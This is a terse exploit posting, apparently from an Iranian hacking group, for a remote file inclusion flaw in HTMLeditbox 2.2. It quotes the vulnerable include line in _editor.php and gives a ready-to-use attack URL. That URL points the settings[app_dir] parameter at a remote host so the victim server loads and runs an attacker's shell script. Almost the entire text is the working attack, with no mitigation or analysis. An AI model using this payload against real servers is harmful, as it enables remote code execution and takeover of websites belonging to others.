+++++++ name & version :HTMLeditbox & 2.2 vendor: http://www.labs4.com by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru bug : _editor.php @include($settings[app_dir].'/inc/config.php'); exploit : http://victim/_editor.php?settings[app_dir]=http://shell ++++++